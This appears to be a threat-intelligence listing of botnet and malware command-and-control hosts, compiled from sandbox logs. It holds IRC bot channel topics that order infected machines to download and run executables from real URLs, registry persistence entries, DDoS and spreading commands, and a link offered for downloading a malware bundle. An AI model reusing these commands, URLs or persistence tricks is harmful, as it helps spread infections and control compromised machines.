dc.studyingcenter-org.com(botnet hosted in China Beijing Chinanet Hebei Province Network)

dc.studyingcenter-org.com 123.183.217.32 dc.tvteam.info dc.babypin.net Outgoing connection to remote server: dc.studyingcenter-org.com TCP port 5943 Outgoing connection to remote server: dc.studyingcenter-org.com TCP port 5943 Outgoing connection to remote server: dc.studyingcenter-org.com TCP port 5943 Outgoing connection to remote server: dc.studyingcenter-org.com TCP port 5943 Registry Changes by all processes Create or Open Changes HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon “Taskman” = c:RECYCLERR-1-5-21-1482476501-1644491937-682003330-1013winfixer.exe Reads

bnet.doesntexist.org(botnet hosted in Ecuador Quito Puntonet S.a)

DNS Lookup Host Name IP Address xeonbox.homeip.net 200.105.228.106 webcache.dyndns.info 127.0.0.1 bnet.doesntexist.org 200.105.228.106 Outgoing connection to remote server: xeonbox.homeip.net TCP port 8888 Outgoing connection to remote server: webcache.dyndns.info TCP port 8888 Outgoing connection to remote server: xeonbox.homeip.net TCP port 8888 Remote Host Port Number 174.132.221.20 80 200.105.228.106 8888 NICK usr331420 USER root 8 * : some

urcdw.zavoddebila.com(botnet hosted in United States Fullerton Staminus Communications)

urcdw.zavoddebila.com DNS_TYPE_A 72.20.14.38 72.20.14.38:33333 Nick: {NOVA}[USA][XP-SP3]610119 Username: VirUs VirUs “” “lol” :My_Name_iS_PIG_and_Iam_A_GaY Joined Channel: ##Turb0-XXX## PRIVMSG #d4 :Done.. PRIVMSG #d2 :Done.. Channel Topic for Channel ##Turb0-XXX##: “!NAZELturbo http://thenaturemedia.in/install.48691.exe ifasfa264.exe | !NAZELturbo http://7arhive.com/setup585.exe afasfa4.exe | !NAZELturbo http://img103.herosh.com/2011/02/09/666929080.gif fsaf24.exe | !NAZELturbo http://img104.herosh.com/2011/02/08/547715969.gif micro1.exe” Private Message to Channel ##Turb0-XXX##: “Executed process “fsaf24.exe”.” Private Message to Channel ##Turb0-XXX##: “Download

m3rcil3ss.co.cc(botnet hosted in Turkey Netinternet-net)

m3rcil3ss.co.cc DNS_TYPE_A 212.252.34.199 212.252.34.199:6667 Nick: [AUS|XP|620207] Username: onfkyav Server Pass: m3rc Joined Channel: #m3rc with Password kxfcrt Channel Topic for Channel #m3rc: “.p2p” Private Message to Channel #m3rc: “[p2p]: Spreading to p2p folders.” Set by ccc on Tue Dec 28 08:36:24 Private Message to User [AUS|XP|620207]: “VERSION” Now talking in #2k38 Process Created: Topic is

pantylost.mooo.com( botnet hosted in China Beijing Chinanet Gansu Province Networ

Botnet C&C irc pantylost.mooo.com ip: 60.165.98.198 marinehh.twilightparadox.com ip: 60.165.98.198 stockingag.jumpingcrab.com ip: 60.165.98.198 pantylost.crabdance.com ip: 60.165.98.198 addr: onthebreak.UglyAs.com ip: 60.165.98.198 headmefc.AsSexyAs.com ip: 60.165.98.198 computercc.ignorelist.com ip: 60.165.98.198 sandtp.chickenkiller.com ip: 60.165.98.198 greenbarc.IsTheBe.st ip: 60.165.98.198 ringc.strangled.net ip: 60.165.98.198 60.165.98.198:8684 NICK [N00_USA_XP_39922187] USER SP2-917 * 0 :COMPUTERNAME Now talking in #blue3 Topic is ‘|.ddosstop -s|.stop -s|.patcher http://58.240.104.57:9008/logo.gif 0 -s|.shttp ftp://ccc:1@60.10.179.100:6054/282.gif

around 52 mb exe files

Here another malware package around 52 mb inside u have multiple malwares Downaload: http://0b975bb5.tinylinks.co

dq.javagames7.com(malware hosted in United States Dallas Theplanet.com Internet Services Inc)

DNS Lookup Host Name IP Address dq.javagames7.com 174.121.62.122 Outgoing connection to remote server: dq.javagames7.com TCP port 8800 Outgoing connection to remote server: dq.javagames7.com TCP port 8800 Outgoing connection to remote server: dq.javagames7.com TCP port 8800 Registry Changes by all processes Create or Open Changes HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon “Taskman” = C:RECYCLERS-1-5-21-0243556031-888888379-781863308-1413syitm.exe HKEY_CURRENT_USERSoftwareMicrosoftWindows NTCurrentVersionWinlogon “Shell” = explorer.exe,C:RECYCLERS-1-5-21-0243556031-888888379-781863308-1413syitm.exe HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun

69.162.99.180(malware hosted in United States Dallas Limestone Networks Inc)

Panel:Outgoing connection to remote server: 69.162.99.180 TCP port 8083 Registry Changes by all processes Create or Open Changes HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun “Network” = rundll32.exe “C:Dokumente und EinstellungenAdministratorsys32config.dll”,network HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionInternet SettingsConnections “DefaultConnectionSettings” = [REG_BINARY, size: 91 bytes] HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionInternet SettingsConnections “SavedLegacySettings” = [REG_BINARY, size: 91 bytes] HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionInternet Settings “AutoConfigURL” = http://win32.z3nos.com:2011/set.pac Reads HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionFontSubstitutes “MS Shell Dlg 2” HKEY_LOCAL_MACHINESOFTWAREMicrosoftCTFSystemShared “CUAS”

master.easyanticheat.net( malware hosted in Sweden Power Och Random T-lane Ab)

DNS Lookup Host Name IP Address master.easyanticheat.net 80.67.10.234 Outgoing connection to remote server: master.easyanticheat.net TCP port 50301 Outgoing connection to remote server: 82.203.212.9 TCP port 50301 Outgoing connection to remote server: 78.47.251.150 TCP port 50301 Registry Changes by all processes Create or Open Changes HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerAdvanced “EnableBalloonTips” = [REG_DWORD, value: 00000001] Reads HKEY_LOCAL_MACHINESOFTWAREMicrosoftCTFSystemShared “CUAS” HKEY_CURRENT_USERKeyboard LayoutToggle

zonetf.com(gbot hosted in United States Scranton Network Operations Center Inc)

DNS Lookup Host Name IP Address iphonefirmware.com 174.121.193.76 127.0.0.1 127.0.0.1 zonetf.com 96.9.169.85 onloneservermonitoring.com 64.191.90.101 www.google.com 209.85.149.106 www.yahoo.com 87.248.122.122 Opened listening TCP connection on port: 55980 Outgoing connection to remote server: iphonefirmware.com TCP port 80 Outgoing connection to remote server: zonetf.com TCP port 80 Outgoing connection to remote server: onloneservermonitoring.com TCP port 80 Outgoing connection to